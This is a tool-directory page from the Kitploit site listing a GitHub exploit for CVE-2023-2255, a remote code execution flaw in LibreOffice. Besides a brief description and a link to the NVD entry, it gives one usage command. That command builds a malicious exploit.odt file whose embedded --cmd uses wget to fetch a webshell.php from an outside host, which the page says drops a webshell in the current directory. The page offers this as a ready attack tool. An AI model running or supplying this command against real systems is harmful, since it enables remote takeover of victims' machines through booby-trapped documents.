Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-2255 — CVE-2023-2255 Libre Office | Kitploit
Tools/GitHubGitHub/elweth-sec/cve-2023-2255
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationShellcode Generation
GitHubelweth-sec/cve-2023-2255

CVE-2023-2255

CVE-2023-2255 Libre Office

View Repository
651143 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Website
Share

CVE-2023-2255

CVE-2023-2255 RCE & load of external ressources found by @Icare1337

  • https://nvd.nist.gov/vuln/detail/CVE-2023-2255

Exploit

Just an example to drop a webshell in current directory.

root@kitploit:~
python3 CVE-2023-2255.py --cmd 'wget https://raw.githubusercontent.com/elweth-sec/CVE-2023-2255/main/webshell.php' --output 'exploit.odt'
Download Tool